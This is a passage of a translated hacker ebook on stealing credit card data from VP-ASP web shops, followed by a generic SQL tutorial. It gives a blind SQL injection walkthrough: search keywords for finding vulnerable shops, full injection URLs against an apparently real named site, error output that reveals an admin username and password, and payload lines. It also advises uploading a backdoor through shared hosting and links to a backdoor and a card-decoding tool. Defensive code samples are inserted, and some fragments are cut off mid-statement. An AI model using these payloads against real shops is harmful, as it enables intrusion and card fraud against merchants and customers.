Hacking Credit Card


  • 8/7/2019 Hacking Credit Card

    1/61

    ------+++-----

    Ebook Hacking Credit Card Version 2, Latest And The End.

    Hacking is only for learning and exchanging security skills.

    Title: Credit Card Should Stop
    ======
    Author: hieupc
    Email: [email protected]
    [email protected]
    http://thegioiebook.com

    =============================

    After hieupc finished version 1, hieupc immediately thought of version 2 of the Ebook Hacking Credit Card. This new version of the Ebook will round out the old one and fill in the gaps that remained in it.

    The most notable tutorial in this Ebook.

    Hacking Credit Card Sql Blind V.1 (Power by Tieuquainho)

    There is an article in Ebook Hacking Credit Card version 1 that describes a hack similar to this one, but this appears to be the most complete write-up.

    A brief introduction to SQL Blind: this is a form of exploitation that relies on a security hole in MSSQL; using this hole we apply exploit strings and search out information from the Server's Database. SQL Blind is a style of exploitation that probes one character at a time. When most other SQL hacking techniques have not succeeded, you can turn to SQL Blind to clear the impasse. The downside is that SQL Blind querying takes a great deal of time and effort, because you have to find each character of the target string one by one. E.g.: to find the admin link, you have to find each letter of the admin-link string in the Database and join them into one string. Too much talk will only confuse you, so let's do it right away to make it easy to understand.

    Preparation:
    - The Opera web browser, Mozilla Firefox v1.3, or anything other than Internet Explorer is ok. You should not use Internet Explorer to hack (^|^)
    - 1 glass of water and 1 face towel to put out fires & wipe off sweat.

    Targets:
    - All versions of VP-ASP from 5.0 and earlier (a type of shop with relatively many bugs and many dead cc (^|^))
    - To find these VP-ASP shops, you can refer to the keywords below when searching on Google, Yahoo or any other search site.
    - Keywords:
      + shopdisplayproducts.asp?id
      + shopaddtocart.asp?catalogid=
    - I give only 2 keywords because they are the main targets that help a search site find VP-ASP.


    Let's start hacking a demo site. The target is hxxps://circleathletics.com/ (running VP-ASP V5.0).

    - First we find this site's admin link:

    hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a')

    Microsoft VBScript runtime error '800a000d'
    Type mismatch: 'clng'
    /shop/shopproductfeatures.asp, line 139

    This means the character we supplied (a) is not the first character of the admin link string. Thinking it over a little, the admin link is usually shopadmin.asp, so in the next statement we replace the letter a with s:

    hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='s')

    Microsoft OLE DB Provider for SQL Server error '80040e07'
    Syntax error converting the varchar value 'xadminpage' to a column of data type int.
    /shop/shop$db.asp, line 409

    - Exactly: the letter S is the first character of the admin link. We continue by trying the following letters:

    hxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,2)='sh')

    - Pay attention to this part: (fieldvalue,2)='sh')

    - Keep substituting like this to work out the admin link. The admin link ends in .asp, so there is no need to find out how many characters the string has.

    Next we find the admin user + pass:

    hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,1)='a')

    Microsoft VBScript runtime error '800a000d'
    Type mismatch: 'clng'
    /shop/shopproductfeatures.asp, line 139

    Nothing there, so carry on the same way:

    hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,1)='c')

    Microsoft OLE DB Provider for SQL Server error '80040e07'
    Syntax error converting the varchar value 'circ54' to a column of data type int.
    /shop/shop$db.asp, line 409

    The User is shown outright; this site is badly broken. On other sites you will have to think a little, as when finding the admin link, and it will be ok hihi:

    hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,2)='ab')

    This is how to find the 2nd character; for the 3rd, extend it to (fldusername,3)='abc'). Dead easy.

    We now have the admin user above, circ54, so we find its pass:

    hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldpassword,1)='a')

    Microsoft VBScript runtime error '800a000d'
    Type mismatch: 'clng'
    /shop/shopproductfeatures.asp, line 13

    hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldpassword,1)='2')

    Microsoft OLE DB Provider for SQL Server error '80040e07'
    Syntax error converting the varchar value '2005HCP' to a column of data type int.
    /shop/shop$db.asp, line 409

    So this one has been hacked hihi, too easy, isn't it? I hope you understand; my writing is clumsy, so please bear with me. Here is some additional reference material:

    *************** Find the admin link ***************

    %20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a')

    *************** Find the pass ***************

    %20or 1=(select fldpassword from tbluser where fldusername='blue42jh' and left(fldpassword,1)='a')
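    The requests above work because the `catalogid` value is concatenated into the SQL text before the page ever converts it to a number. The following is an added example, not code from the ebook or from VP-ASP, showing that pattern beside a validated, parameter-bound lookup. It assumes SQLite as a stand-in for MS SQL Server (so the signal is a changed row count rather than an error message, and `substr()` replaces `left()`); the `products` table, its rows and the `demo_admin` account are constructed.

```python
import sqlite3


def make_shop_db():
    """Build a small in-memory stand-in for the shop database (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (catalogid INTEGER PRIMARY KEY, cname TEXT);
        CREATE TABLE tbluser (fldusername TEXT, fldpassword TEXT, admintype TEXT);
        INSERT INTO products VALUES (6, 'Constructed item A');
        INSERT INTO products VALUES (7, 'Constructed item B');
        INSERT INTO tbluser VALUES ('demo_admin', 'not-a-real-secret', 'super');
    """)
    return db


def lookup_concatenated(db, catalogid):
    """Vulnerable pattern: the raw query-string value becomes part of the SQL text."""
    sql = "SELECT cname FROM products WHERE catalogid=" + catalogid
    return [row[0] for row in db.execute(sql)]


def lookup_bound(db, catalogid):
    """Hardened pattern: check the type first, then bind the value as a parameter."""
    if not (catalogid.isascii() and catalogid.isdigit()) or len(catalogid) > 9:
        raise ValueError("catalogid must be a short decimal integer")
    sql = "SELECT cname FROM products WHERE catalogid=?"
    return [row[0] for row in db.execute(sql, (int(catalogid),))]


def probe(guess):
    """Same shape as the predicate on this page, rewritten for SQLite."""
    return ("6 or 1=(select 1 from tbluser where admintype='super' "
            f"and substr(fldusername,1,1)='{guess}')")


def demo():
    """Run the same inputs through both lookups and collect what each returns."""
    db = make_shop_db()
    out = {
        "normal": lookup_concatenated(db, "6"),
        # Wrong guess: the subquery is empty, only the requested product returns.
        "guess_wrong": lookup_concatenated(db, probe("a")),
        # Right guess: the OR branch is true for every row, so the response changes.
        "guess_right": lookup_concatenated(db, probe("d")),
    }
    for name, value in (("bound_normal", "6"), ("bound_probe", probe("d"))):
        try:
            out[name] = lookup_bound(db, value)
        except ValueError as exc:
            out[name] = f"rejected: {exc}"
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:12} {value}")
```

    With the bound lookup the response no longer depends on data in `tbluser`, which removes the yes/no signal the character-by-character search relies on. Returning a generic error page instead of the raw database error text removes the second signal shown in the walkthrough.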

    fldpassword='" & userpassword & "'"
    Set rs = myconn.Execute(SQL)
    if not rs.eof then
        CheckSecondpassword rc
        If rc=0 then
            GetAdminData rs
        else
            closerecordset rs
            shopclosedatabase myconn
            msg=Secondpasswordmsg & "<br>"
        end if
    else
        rs.close
        set rs=nothing
        LocateSupplier
    end if
    if msg="" then
        msg=LangAdmin01 & "<br>"
    end if
    Shopclosedatabase myconn
    else
        msg=LangAdmin01 & "<br>"
        Shopclosedatabase myconn
    end if
    end if
    AdminPageHeader
    if msg <> "" Then
        response.write getconfig("xfont") & msg & ""
    end if
    %>

    0 then
        msg="database Open error<br>" & GetSess("Openerror")
    else
        If Not rs.EOF Then
            setsess "shopadmin" ,request("username")
            setsess "admintype","supplier"
            setsess "login" , rs("supplieruserid")
            setsess("supplierid"),rs("supplierid")
            rs.close
            set rs=nothing
            GetUserTables
            ' setsess "usertables",rs("tablesallowed")
            LogUser GetSess("ShopAdmin"), "in", myconn
            Shopclosedatabase myconn
            response.redirect "shopadmin1.asp"
        else
            rs.close
            set rs=nothing
        end if
    end if
    end sub

    Sub GetUserTables
    dim rs
    sql = "select * from tbluser where fldusername='supplier'"
    Set rs = myconn.Execute(SQL)
    if err.number>0 then
        msg="database Open error<br>" & GetSess("Openerror")
    else
        If Not rs.EOF Then
            setsess "usertables",rs("tablesallowed")
            setsess "adminmenus",rs("fldaccess")
        end if
    end if
    rs.close
    set rs=nothing
    end sub

    Sub Checksecurity (ipassword)
    dim tpassword
    tpassword=ucase(ipassword)
    if tpassword="VPASP" or tpassword="ADMIN" then
        setsess "security","Yes"
    end if
    end sub

    '*******************************************************************
    ' if using second password facility, the validate it
    '*******************************************************************
    Sub CheckSecondPassword(rc)
    dim password
    rc=4
    If secondpassword="" then
        rc=0
        exit sub
    end if
    password=request.form("password2")
    if password="" then exit sub
    if ucase(password)<>ucase(secondpassword) then exit sub
    rc=0
    end sub
    %>

    Note the text in blue: this is where the VPASP shop's second password is set. Previously nobita had reasoned that this second password might be fixed by VPASP and stored in the shop's database, but that is not correct. From the way the second password is set here, nobita thinks it is probably something the webmaster edits in, following VPASP's instructions. The password can be set in different places, for example:

    CODE

    ordertracking, prodcategories, prodfeatures, products, projects, quantitydiscounts,
    registrant, registryitems, reviews, searchresults, shipmethods, pass_access,
    suppliers, tblaccess, tbllog, tbluser,
    CHECK_CONSTRAINTS, COLUMN_DOMAIN_USAGE, COLUMN_PRIVILEGES, COLUMNS,
    CONSTRAINT_COLUMN_USAGE, CONSTRAINT_TABLE_USAGE, DOMAIN_CONSTRAINTS, DOMAINS,
    KEY_COLUMN_USAGE, REFERENTIAL_CONSTRAINTS, SCHEMATA, TABLE_CONSTRAINTS,
    TABLE_PRIVILEGES, TABLES, VIEW_COLUMN_USAGE, VIEW_TABLE_USAGE, VIEWS

    This search method takes a great deal of effort, because you have to find all of its tables, and with the current way of hacking that means guessing table names, or blind-probing each character of the table name. You can sit at it all day and still not get through 1 shop. However, so far nobita has not found any better solution for this kind. I hope this article helps you all search for pass 2 more effectively.
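    Character-by-character probing of this kind leaves a recognisable trail in web server logs: many requests from one client whose query string holds a subquery and a `left(column,n)='...'` test with growing `n`. The following is an added example, not part of the ebook, that summarises such probing per client so a responder can see which columns were targeted and how deep the guessing went. The log layout (date, time, client IP, method, path, query, status) is a simplified assumption, and all log lines and addresses are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed access-log lines: date time client-ip method path query status
SAMPLE_LOG = """\
2005-03-01 10:00:01 198.51.100.7 GET /shop/shopdisplayproducts.asp id=4 200
2005-03-01 10:02:10 203.0.113.9 GET /shop/shopaddtocart.asp catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a') 500
2005-03-01 10:02:19 203.0.113.9 GET /shop/shopaddtocart.asp catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='s') 500
2005-03-01 10:02:31 203.0.113.9 GET /shop/shopaddtocart.asp catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,2)='sh') 500
2005-03-01 10:03:02 203.0.113.9 GET /shop/shopaddtocart.asp catalogid=6%20or%201=(select%20fldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,1)='a') 500
2005-03-01 10:05:44 192.0.2.44 GET /shop/shopsearch.asp keyword=select%20left%20handed%20gloves 200
2005-03-01 10:06:00 198.51.100.7 GET /shop/shopaddtocart.asp catalogid=6 200
"""

# A comparison against a parenthesised subquery, e.g. "1=(select ..."
SUBQUERY = re.compile(r"=\s*\(\s*select\b", re.I)
# A prefix test such as left(fieldvalue,2)='sh'
PREFIX_TEST = re.compile(r"left\(\s*(\w+)\s*,\s*(\d+)\s*\)\s*=\s*'([^']*)'", re.I)


def parse_line(line):
    """Split one log line into fields; return None for lines in another layout."""
    parts = line.split()
    if len(parts) != 7 or not parts[6].isdigit():
        return None
    return {
        "time": parts[0] + " " + parts[1],
        "ip": parts[2],
        "path": parts[4],
        "query": unquote(parts[5]),
        "status": int(parts[6]),
    }


def find_prefix_probing(log_text, min_requests=3):
    """Return {client_ip: summary} for clients that sent repeated prefix probes."""
    clients = defaultdict(lambda: {"requests": 0, "server_errors": 0,
                                   "depth": {}, "first": None, "last": None})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not SUBQUERY.search(rec["query"]):
            continue
        tests = PREFIX_TEST.findall(rec["query"])
        if not tests:
            continue
        entry = clients[rec["ip"]]
        entry["requests"] += 1
        entry["server_errors"] += int(rec["status"] >= 500)
        entry["first"] = entry["first"] or rec["time"]
        entry["last"] = rec["time"]
        for column, length, _guess in tests:
            # Longest prefix length seen per column: how far the guessing got.
            col = column.lower()
            entry["depth"][col] = max(entry["depth"].get(col, 0), int(length))
    return {ip: e for ip, e in clients.items() if e["requests"] >= min_requests}


if __name__ == "__main__":
    for ip, summary in find_prefix_probing(SAMPLE_LOG).items():
        print(ip, summary)
```

    The `depth` map names the columns whose contents should be treated as exposed; the ordinary search request containing the words "select" and "left" is not flagged because it has neither a subquery comparison nor a prefix test.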

    Article by hieupc:

    From what hieupc knows from experience, if you want to hack a shop's second password (Secure Pass), local hacking is the quickest and neatest way; apart from local hacking, you can follow nobita's experience article to obtain pass 2. Local hacking seems to become very easy once you have a host in hand, and you only need to upload a backdoor, such as remview.php, to be able to hack. However, this requires you to have solid knowledge of Hosting and DNS. To find out which server the shop is on, you can check DNS or the IP to locate it, and from there follow the trail and register a host for yourself on the same host as the shop whose pass 2 you need. As for how to do local hacking and DNS checks, or to understand hosts better, you can visit the following sites, which have specific guides: http://viethacker.org , http://hvaonline.net and, for checking DNS and looking up information: http://pavietnam.net , http://checkdomain.com , http://whoisc.com , http://check-dns.com. There are also many other web sites; you can search on google.com.

    Remview.php : http://php.spb.ru/remview/remview_2003_10_23.zip

    There are also many other Mshells and Backdoors that can be found on google.com or via the site http://viethacker.org

    Decode encrypted CC: http://rapidshare.de/files/8343810/decodecc.rar.html (pass unrar : thegioiebook.com )

    Articles you need to read to get a firm grasp of Hacking Credit Card knowledge.


    - Introduction to SQL.

    Source: diendantinhoc.net

    ~~~~~~~~~~~~~~~~~~~~~~~

    SQL is the ANSI standard language for accessing databases.

    What is SQL?

    SQL stands for Structured Query Language.
    SQL lets you access a database.
    SQL is an ANSI standard language.
    SQL can execute queries against a database.
    SQL can retrieve data from a database.
    SQL can insert new data into a database.
    SQL can delete data from a database.
    SQL can modify existing data in a database.
    SQL is easy to learn :-)

    SQL is a standard

    SQL is a standard of ANSI (American National Standards Institute) for accessing database systems. SQL statements are used to retrieve and update data in a database.

    SQL works with most database programs such as MS Access, DB2, Informix, MS SQL Server, Oracle, Sybase, etc.

    Note: Most database programs that support SQL have their own extensions to SQL that work only with that program.

    Database tables

    A database usually consists of one or more tables. Each table is identified by a name (for example Customers or Orders). A table contains records (rows), which are the table's data.

    Below is an example of a table named Persons:

    LastName   FirstName  Address       City
    Hansen     Ola        Timoteivn 10  Sandnes
    Svendson   Tove       Borgvn 23     Sandnes
    Pettersen  Kari       Storgt 20     Stavanger

    The table above contains 3 records (rows), each corresponding to one person, and four columns (LastName, FirstName, Address and City).

    SQL queries

    With SQL we can query a database and receive the result that is returned.

    A query like this:

    SELECT LastName FROM Persons

    returns the following result:

    LastName
    Hansen
    Svendson
    Pettersen

    Note: Some database systems require an SQL statement to end with a semicolon (;). We will not use the semicolon in this article.

    SQL is a data manipulation language (DML - Data Manipulation Language)

    SQL is a syntax for executing queries. SQL also includes syntax for updating, inserting and deleting records.

    The following is the list of DML statements and queries of SQL:

    SELECT - retrieves data from a database table.
    UPDATE - updates/modifies data in a table.
    DELETE - deletes data from a table.
    INSERT INTO - adds new data to a table.

    SQL is a data definition language (DDL - Data Definition Language)

    The DDL part of SQL allows tables to be created or deleted. We can also define keys and indexes, specify links between tables and set up constraints between the tables in a database.

    The most important DDL statements of SQL are:

    CREATE TABLE - creates a new table.
    ALTER TABLE - changes the structure of a table.
    DROP TABLE - deletes a table.
    CREATE INDEX - creates an index (search key).
    DROP INDEX - deletes an index that was created.

    - The SELECT statement

    The SELECT statement is used to retrieve data from a table. The result is returned in table form and stored in a table called the result table (also called the result set).

    Syntax

    The syntax of the SELECT statement is as follows:

    SELECT column_names
    FROM table_name

    Retrieving several columns

    To retrieve the columns named LastName and FirstName, we use a SELECT statement like this:

    SELECT LastName, FirstName FROM Persons

    The Persons table:

    LastName   FirstName  Address       City
    Hansen     Ola        Timoteivn 10  Sandnes
    Svendson   Tove       Borgvn 23     Sandnes
    Pettersen  Kari       Storgt 20     Stavanger

    Result:

    LastName   FirstName
    Hansen     Ola
    Svendson   Tove
    Pettersen  Kari

    Retrieving all columns

    To retrieve all columns from the Persons table, we use the * symbol in place of the list of columns:

    SELECT * FROM Persons

    Result:

    LastName   FirstName  Address       City
    Hansen     Ola        Timoteivn 10  Sandnes
    Svendson   Tove       Borgvn 23     Sandnes
    Pettersen  Kari       Storgt 20     Stavanger

    The result set

    The result returned from an SQL query is stored in a result set. Most database software systems allow the result set to be traversed with programming functions such as Move-To-First-Record, Get-Record-Content, Move-To-Next-Record, etc.

    The semicolon (;) after a statement

    The semicolon is the standard way to separate SQL statements when the database system allows several SQL statements to be executed in a single call.

    The SQL statements in this article are all single statements (each one is one and only one SQL statement). MS Access and MS SQL Server do not require a semicolon after each SQL statement, but some other database programs may force you to add a semicolon after each SQL statement (even a single one). To repeat, in this article we will not use a semicolon at the end of SQL statements.

    - The WHERE clause

    To retrieve data from a table according to some condition, a WHERE clause can be added to the SELECT statement.

    Syntax

    The syntax of the WHERE clause in a SELECT statement is as follows:

    SELECT column_name FROM table_name
    WHERE column_name operator value

    In the WHERE clause, the operators that can be used are

    Operator  Description
    =         Equal
    <>        Not equal
    >         Greater than
    <         Less than
    >=        Greater than or equal

    displays a row if ANY of the conditions is met.

    Table used in the examples

    LastName   FirstName  Address       City
    Hansen     Ola        Timoteivn 10  Sandnes
    Svendson   Tove       Borgvn 23     Sandnes
    Svendson   Stephen    Kaivn 18      Sandnes

    Example 1

    Use AND to find the people whose first name is Tove and whose last name is Svendson:

    SELECT * FROM Persons
    WHERE FirstName = 'Tove'
    AND LastName = 'Svendson'

    Result:

    LastName   FirstName  Address       City
    Svendson   Tove       Borgvn 23     Sandnes

    Example 2

    Use OR to find the people whose first name is Tove or whose last name is Svendson:

    SELECT * FROM Persons
    WHERE firstname = 'Tove'
    OR lastname = 'Svendson'

    Result:

    LastName   FirstName  Address       City
    Svendson   Tove       Borgvn 23     Sandnes
    Svendson   Stephen    Kaivn 18      Sandnes

    Example 3

    You can also combine AND and OR with parentheses to build complex queries:

    SELECT * FROM Persons WHERE
    (FirstName = 'Tove' OR FirstName = 'Stephen')
    AND LastName = 'Svendson'

    Result:

    LastName   FirstName  Address       City
    Svendson   Tove       Borgvn 23     Sandnes
    Svendson   Stephen    Kaivn 18      Sandnes

    Hansen     Ola        Timoteivn 10  Sandnes    1951
    Svendson   Tove       Borgvn 23     Sandnes    1978
    Svendson   Stale      Kaivn 18      Sandnes    1980
    Pettersen  Kari       Storgt 20     Stavanger  1960

    Result:

    LastName   FirstName  Address       City       Year
    Hansen     Ola        Timoteivn 10  Sandnes    1951
    Svendson   Tove       Borgvn 23     Sandnes    1978
    Svendson   Stale      Kaivn 18      Sandnes    1980

    Using quotes

    Note that in the example above we used two single quotes (') around the condition value 'Sandnes'.

    SQL uses single quotes around text string values. Many database systems also allow double quotes ("). Numeric values are not enclosed in quotes.

    For text string data:

    Correct statement:

    SELECT * FROM Persons WHERE FirstName = 'Tove'

    Incorrect statement:

    SELECT * FROM Persons WHERE FirstName = Tove

    For numeric data:

    Correct statement:

    SELECT * FROM Persons WHERE Year > 1965

    Incorrect statement:

    SELECT * FROM Persons WHERE Year > '1965'

    The LIKE condition

    The LIKE operator is used to search for a text pattern in a column.

    Syntax

    The syntax of the LIKE operator is as follows:

    SELECT column_name FROM table_name
    WHERE column_name LIKE pattern

    A % sign can be used to define wildcard characters. % can be placed before and/or after the pattern.

    Using LIKE

    The following SQL statement returns the list of people whose first name starts with the letter O:

    SELECT * FROM Persons
    WHERE FirstName LIKE 'O%'

    The following SQL statement returns the list of people whose first name ends with the letter a:

    SELECT * FROM Persons
    WHERE FirstName LIKE '%a'

    The following SQL statement returns the list of people whose first name contains the string la:

    SELECT * FROM Persons
    WHERE FirstName LIKE '%la%'

    The BETWEEN...AND operator

    selects a range of data lying between two values. The two values can be numbers, text strings or dates.

    SELECT column_name FROM table_name
    WHERE column_name
    BETWEEN value_1 AND value_2

    Table used in the examples

    LastName   FirstName  Address       City
    Hansen     Ola        Timoteivn 10  Sandnes
    Nordmann   Anna       Neset 18      Sandnes
    Pettersen  Kari       Storgt 20     Stavanger
    Svendson   Tove       Borgvn 23     Sandnes

    Example 1

    Find all the people whose last name (in alphabetical order) lies between Hansen (Hansen included) and Pettersen (Pettersen not included):

    SELECT * FROM Persons WHERE LastName
    BETWEEN 'Hansen' AND 'Pettersen'

    Result:

    LastName   FirstName  Address       City
    Hansen     Ola        Timoteivn 10  Sandnes
    Nordmann   Anna       Neset 18      Sandnes

    Important note: The BETWEEN...AND operator returns different results on different database systems. On some database systems, BETWEEN...AND returns the rows whose values truly lie "between" the two values (that is, it leaves out values equal to either endpoint). Some database systems include values equal to both endpoints. Still other database systems include values equal to the first endpoint but not the second (as in the example above). You therefore have to check the database system you are using when you use the BETWEEN...AND operator.

    Example 2

    To find the people whose last name (in alphabetical order) lies outside the range of the two values in example 1, we add the NOT operator:

    SELECT * FROM Persons WHERE LastName
    NOT BETWEEN 'Hansen' AND 'Pettersen'

    Result:

    LastName   FirstName  Address       City
    Pettersen  Kari       Storgt 20     Stavanger
    Svendson   Tove       Borgvn 23     Sandnes

    -------------------------------

    The DISTINCT keyword

    The SELECT statement returns information from the columns of a table. But what if we do not want to get duplicate values back?

    With SQL, we only need to add the DISTINCT keyword to the SELECT statement, using the following syntax:

    SELECT DISTINCT column_name FROM table_name

    Example: Find all the companies in the orders table

    Our orders table is as follows:

    Company    OrderNumber
    Sega       3412
    W3Schools  2312
    Trio       4678
    W3Schools  6798

    The following SQL statement:

    SELECT Company FROM Orders

    returns the result:

    Company
    Sega
    W3Schools
    Trio
    W3Schools

    The company name W3Schools appears twice in the result; sometimes this is not what we want.

    Example: Find all the different companies in the orders table

    The following SQL statement:

    SELECT DISTINCT Company FROM Orders

    returns the result:

    Company
    Sega
    W3Schools
    Trio

    The company name W3Schools now appears only once; sometimes this is what we want.

    --------------------------------

    The ORDER BY keyword is used to sort the returned result.

    Sorting rows

    The ORDER BY clause is used to sort rows.

    Example Orders table:

    Company    OrderNumber
    Sega       3412
    ABC Shop   5678
    W3Schools  2312
    W3Schools  6798

    Example:

    To list the companies in alphabetical order (ascending):

    SELECT Company, OrderNumber FROM Orders
    ORDER BY Company

    Result:

    Company    OrderNumber
    ABC Shop   5678
    Sega       3412
    W3Schools  6798
    W3Schools  2312

    Example:

    List the companies in alphabetical order (ascending) and the order numbers in ascending numeric order:

    SELECT Company, OrderNumber FROM Orders
    ORDER BY Company, OrderNumber

    Result:

    Company    OrderNumber
    ABC Shop   5678
    Sega       3412
    W3Schools  2312
    W3Schools  6798

    Example:

    List the companies in descending order:

    SELECT Company, OrderNumber FROM Orders
    ORDER BY Company DESC

    Result:

    Company    OrderNumber
    W3Schools  6798
    W3Schools  2312
    Sega       3412
    ABC Shop   5678

    The INSERT INTO statement

    The INSERT INTO statement is used to insert a new row into a table.

    Syntax:

    INSERT INTO table_name
    VALUES (value_1, value_2,....)

    You can also specify which columns/fields the data should be inserted into:

    INSERT INTO table_name (column_1, column_2,...)
    VALUES (value_1, value_2,....)

    Inserting 1 new row

    We have the Persons table as follows:

    LastName   FirstName  Address       City
    Pettersen  Kari       Storgt 20     Stavanger

    The following SQL statement:

    INSERT INTO Persons
    VALUES ('Hetland', 'Camilla', 'Hagabakka 24', 'Sandnes')

    produces the following result in the Persons table:

    LastName   FirstName  Address       City
    Pettersen  Kari       Storgt 20     Stavanger
    Hetland    Camilla    Hagabakka 24  Stavanger

    Inserting data into specific columns/fields

    With the Persons table as above, the following SQL statement:

    INSERT INTO Persons (LastName, Address)
    VALUES ('Rasmussen', 'Storgt 67')

    produces the result:

    LastName   FirstName  Address       City
    Pettersen  Kari       Storgt 20     Stavanger
    Hetland    Camilla    Hagabakka 24  Stavanger
    Rasmussen             Storgt 67

    --------------------------

    The UPDATE statement

    The UPDATE statement is used to update/modify data already in a table.

    Syntax:

    UPDATE table_name
    SET column_name = new_value
    WHERE column_name = value

    Example: our Person table is as follows:

    LastName   FirstName  Address       City
    Nilsen     Fred       Kirkegt 56    Stavanger
    Rasmussen             Storgt 67

    Updating 1 column in 1 row

    Suppose we want to add a first name for the person whose last name is Rasmussen:

    UPDATE Person SET FirstName = 'Nina'
    WHERE LastName = 'Rasmussen'

    We get the following result:

    LastName   FirstName  Address       City
    Nilsen     Fred       Kirkegt 56    Stavanger
    Rasmussen  Nina       Storgt 67

    Updating several columns in 1 row

    Now we want to change the name and address:

    UPDATE Person
    SET Address = 'Stien 12', City = 'Stavanger'
    WHERE LastName = 'Rasmussen'

    The result is:

    LastName   FirstName  Address       City
    Nilsen     Fred       Kirkegt 56    Stavanger
    Rasmussen  Nina       Stien 12      Stavanger

    -------------------------

    The DELETE statement

    is used to delete rows from a table.

    Syntax:

    DELETE FROM table_name
    WHERE column_name = value

    Example: Our Person table is as follows:

    LastName   FirstName  Address       City
    Nilsen     Fred       Kirkegt 56    Stavanger
    Rasmussen  Nina       Stien 12      Stavanger

    Deleting 1 row:

    We delete the person named Nina Rasmussen:

    DELETE FROM Person WHERE LastName = 'Rasmussen'

    Result after the delete:

    LastName   FirstName  Address       City
    Nilsen     Fred       Kirkegt 56    Stavanger

    Deleting all rows:

    Sometimes we want to delete all the data in a table but keep the table itself, with its structure and all its attributes. We can use the statement:

    DELETE FROM table_name

    or

    DELETE * FROM table_name

    SQL has a built-in function for counting rows in a database.

    Syntax of the COUNT function:

    SELECT COUNT(column_name) FROM table_name

    The COUNT(*) function:

    The COUNT(*) function returns the number of rows selected in the table.

    For example, we have the Persons table as follows:

    Name             Age
    Hansen, Ola      34
    Svendson, Tove   45
    Pettersen, Kari  19

    The following statement returns the number of rows in the table:

    SELECT COUNT(*) FROM Persons

    and the result returned is:

    3

    The following statement returns the number of people older than 20:

    SELECT COUNT(*) FROM Persons WHERE Age > 20

    the result returned is:

    2

    The COUNT(column) function:

    The COUNT(column) function returns the number of rows that have a non-NULL value in the specified column.

    For example, we have the Persons table as follows:

    Name             Age
    Hansen, Ola      34
    Svendson, Tove   45
    Pettersen, Kari

    The following statement returns the number of people whose Age column in the table is not empty:

    SELECT COUNT(Age) FROM Persons

    and the result returned is:

    2

    The COUNT DISTINCT clause

    Note: The examples below work only with Oracle and MS SQL Server databases, and do not work on MS Access (not yet tested with other database systems!)

    The DISTINCT and COUNT keywords can be used together to count the number of distinct results.

    The syntax is as follows:

    SELECT COUNT(DISTINCT column(s)) FROM table

    For example, we have the Orders table as follows:

    Company    OrderNumber
    Sega       3412
    W3Schools  2312
    Trio       4678
    W3Schools  6798

    The following SQL statement:

    SELECT COUNT(DISTINCT Company) FROM Orders

    returns the result:

    3

    Advanced SQL

    Functions

    SQL has quite a few built-in functions for counting and calculating.

    Syntax:

    The syntax for calling a function in an SQL statement is as follows:

    SELECT function(column_name) FROM table_name

    The table we will use in the following examples:

    Name             Age
    Hansen, Ola      34
    Svendson, Tove   45
    Pettersen, Kari  19

    The AVG(column) function

    The AVG function returns the average value of the specified column over the selected rows. NULL values are not considered when the average is calculated.

    Example:

    The following statement calculates the average age of the people aged over 20:

    SELECT AVG(Age) FROM Persons WHERE Age > 20

    the result returned is:

    39.5

    The MAX(column) function

    The MAX function returns the largest value in the column. NULL values are not considered.

    Example:

    SELECT MAX(Age) FROM Persons

    result:

    45

    The MIN(column) function

    The MIN function returns the smallest value in the column. NULL values are not considered.

    Example:

    SELECT MIN(Age) FROM Persons

    result:

    19

    Note: The MIN and MAX functions can also be applied to columns whose data is text strings. The data in the column is compared in ascending dictionary order.

    The SUM(column) function

    The SUM function returns the total of the values in the column. NULL values are not considered.

    Example:

    Find the total age of all the people in the table:

    SELECT SUM(Age) FROM Persons

    result:

    98

    Example:

    Find the total age of all the people older than 20:

    SELECT SUM(Age) FROM Persons WHERE Age > 20

    result:

    79

    GROUP BY and HAVING

    Aggregate functions (such as SUM) usually need the added functionality of the GROUP BY clause.

    GROUP BY...

    The GROUP BY... clause was added to SQL because aggregate functions (such as SUM) return an aggregate of all the values in the column each time they are called, and without GROUP BY we could not calculate the total of the values for each separate group in the column.

    The syntax of GROUP BY is as follows:

    SELECT column_name, SUM(column_name) FROM table_name GROUP BY column_name

    Example using GROUP BY:

    Suppose we have the Sales table as follows:

    Company    Amount
    W3Schools  5500
    IBM        4500
    W3Schools  7100

    The following SQL statement:

    SELECT Company, SUM(Amount) FROM Sales

    returns the result:

    Company    SUM(Amount)
    W3Schools  17100
    IBM        17100
    W3Schools  17100

    The result above is sometimes not what we expect. We add the GROUP BY clause to the SQL statement:

    SELECT Company, SUM(Amount) FROM Sales
    GROUP BY Company

    and this time the result returned is:

    Company    SUM(Amount)
    W3Schools  12600
    IBM        4500

